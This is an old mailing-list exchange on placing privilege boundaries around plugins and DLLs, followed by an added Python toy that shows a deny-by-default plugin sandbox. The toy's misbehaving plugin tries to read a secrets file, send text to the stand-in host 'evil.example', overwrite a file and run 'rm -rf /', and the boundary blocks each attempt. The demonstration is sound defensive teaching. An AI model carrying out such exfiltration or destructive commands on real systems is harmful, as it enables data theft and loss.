On Fri, 18 Aug 2006, Chuck Guzis wrote:

> On 8/18/2006 at 3:17 PM Don wrote:
>
>> But, user applications can be developed using tools that fail to observe
>> your conventions WITHIN their application. I.e. it seems like the only
>> mechanisms that you can put in place are those that are invoked at
>> protection boundaries. (?)
>>
>> Why are protections primarily reserved for OS-level tasks? Why not subset
>> protections within the user area? A user should be able to say that a
>> plugin or DLL should have only a certain limited number of privileges.
>
> This is computationally expensive and complicated. Every time you have to
> cross a privilege boundary you have to switch context, validate any data
> going across and verify permissions. You also need an exact specification
> of the interface for every such interface - if the system doesn't know
> what your DLL is allowed to do, how can it stop it from doing what it
> shouldn't? This is why this sort of pain is usually reserved for the
> user-kernel interface.
Or, in a microkernel/multiserver environment, between any
two *services*/client/etc.
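As an added example (not code from this thread or from any of its participants), here is a toy in-process version of the "subset protections within the user area" idea the thread is debating: a plugin reaches host state only through a single boundary object that holds an exact interface specification, the privileges the user granted, and per-call argument validation, so every crossing costs a lookup plus checks, exactly the overhead Chuck describes. The interface, the privilege names (`fs.read`, `fs.write`, `net`), the host state and the two plugins are all constructed for the example and stand in for a real application's DLL interface.

```python
"""Added example: a user-space privilege boundary for plugins (constructed)."""
from dataclasses import dataclass
from typing import Any, Callable, Dict, FrozenSet, List, Tuple


class BoundaryViolation(Exception):
    """A call across the plugin boundary failed a check."""


@dataclass(frozen=True)
class Op:
    """Exact specification of one host operation: parameter types, the
    privilege a plugin must hold to call it, and the host-side handler."""
    params: Tuple[type, ...]
    privilege: str
    handler: Callable[..., Any]


class Boundary:
    """The only route from a plugin to host state. Each call() is the
    in-process analogue of a privilege-boundary crossing: look the op up in
    the interface spec (deny by default), check the caller's privileges,
    validate the arguments, then run the host handler."""

    def __init__(self, interface: Dict[str, Op], granted: FrozenSet[str]):
        self.interface = interface
        self.granted = granted
        self.crossings = 0          # the cost is visible: one per call
        self.denied: List[str] = []  # ops refused, in order

    def call(self, op_name: str, *args: Any) -> Any:
        self.crossings += 1
        op = self.interface.get(op_name)
        if op is None:
            self.denied.append(op_name)
            raise BoundaryViolation(f"{op_name}: not in interface")
        if op.privilege not in self.granted:
            self.denied.append(op_name)
            raise BoundaryViolation(f"{op_name}: requires {op.privilege!r}")
        if len(args) != len(op.params) or any(
                type(a) is not t for a, t in zip(args, op.params)):
            self.denied.append(op_name)
            raise BoundaryViolation(f"{op_name}: bad arguments {args!r}")
        try:
            return op.handler(*args)
        except BoundaryViolation:
            self.denied.append(op_name)   # handler-level data validation
            raise


# Constructed host state standing in for the real application's files.
HOST_FILES: Dict[str, str] = {"doc.txt": "teh quick brown fox",
                              "secrets.txt": "hunter2"}
PLUGIN_VISIBLE = frozenset({"doc.txt"})   # what plugins may name at all
NETWORK_LOG: List[str] = []               # constructed: what a send would leak


def host_read(path: str) -> str:
    # Privilege alone is not enough: the data crossing the boundary is
    # validated too, so fs.read does not imply reading every file.
    if path not in PLUGIN_VISIBLE:
        raise BoundaryViolation(f"read_file: path {path!r} rejected")
    return HOST_FILES[path]


def host_write(path: str, data: str) -> None:
    HOST_FILES[path] = data


def host_send(host: str, data: str) -> None:
    NETWORK_LOG.append(f"{host}:{data}")


INTERFACE: Dict[str, Op] = {
    "read_file": Op((str,), "fs.read", host_read),
    "write_file": Op((str, str), "fs.write", host_write),
    "net_send": Op((str, str), "net", host_send),
}


def spellcheck_plugin(api: Boundary) -> int:
    """Well-behaved plugin: counts the words in the open document."""
    return len(api.call("read_file", "doc.txt").split())


def exfil_plugin(api: Boundary) -> int:
    """Misbehaving plugin: tries things it was never granted."""
    text = api.call("read_file", "doc.txt")
    for attempt in (("read_file", "secrets.txt"),
                    ("net_send", "evil.example", text),
                    ("write_file", "doc.txt", "pwned"),
                    ("exec", "rm -rf /")):
        try:
            api.call(*attempt)
        except BoundaryViolation:
            pass                   # refused; recorded in api.denied
    return len(text)


def run_plugin(plugin: Callable[[Boundary], Any],
               granted: FrozenSet[str]) -> Tuple[Any, List[str], int]:
    """Load a plugin with only the privileges the user chose for it."""
    api = Boundary(INTERFACE, granted)
    result = plugin(api)
    return result, api.denied, api.crossings


if __name__ == "__main__":
    print(run_plugin(spellcheck_plugin, frozenset({"fs.read"})))
    print(run_plugin(exfil_plugin, frozenset({"fs.read"})))
```

The point the toy makes is the one the thread reaches: none of this works unless the interface is spelled out per operation (parameter types and required privilege), and unknown operations must be refused by default, since the boundary cannot reason about a call it has no specification for. In a real system each `call()` would additionally be a context switch into a separate process or server, which is where the cost Chuck mentions comes from.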